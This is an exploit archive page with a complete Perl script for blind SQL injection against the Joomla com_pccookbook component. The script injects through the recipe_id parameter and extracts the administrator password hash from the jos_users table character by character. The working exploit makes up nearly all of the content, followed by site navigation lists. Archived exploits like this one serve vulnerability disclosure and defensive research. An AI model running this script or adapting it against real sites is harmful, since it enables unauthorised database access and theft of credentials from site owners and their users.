Joomla PC Cookbook Component Blind SQL Injection

Joomla PC Cookbook Component Blind SQL Injection: Posted Jan 21, 2009; Authored by Cyb3r-1sT; Joomla com_pccookbook blind remote SQL injection exploit.; tags | exploit, remote, sql injection; SHA-256 | 05e8e1cbd1abf9c196f6f1c5072a1dfb2a5f0d8c81ea7a2e82a777c78d1e6f41; Download | Favorite | View

Joomla PC Cookbook Component Blind SQL Injection

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                        \n";                                                             
  print "  #########################################################################\n";
  print "  #   \n";
  print "  #            Joomla com_pccookbook Blind sql injection exploit \n";
  print "  #   \n";
  print "  #                              Cyb3R-1sT \n";
  print "  #                       cyb3r-1st[at]hotmail.com \n";
  print "  #   \n";
  print "  #                Usage:perl file.pl host path <options> \n";
  print "  #            example: perl file.pl www.host.com /joomla/ -a 7 \n";
  print "  #   \n";
  print "  #                           Options:  -a id \n";
  print "  #   \n";
  print "  #########################################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"a"})
{
  $aid = $options{"a"};
}

syswrite(STDOUT, "[~] Password: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $aid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $aid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $aid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Ingredients";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 60 files
Debian 19 files
Gentoo 8 files
Apple 5 files
Google Security Research 4 files
Jann Horn 3 files
Spencer McIntyre 3 files
LiquidWorm 3 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Joomla PC Cookbook Component Blind SQL Injection

Joomla PC Cookbook Component Blind SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla PC Cookbook Component Blind SQL Injection

Share This

Joomla PC Cookbook Component Blind SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems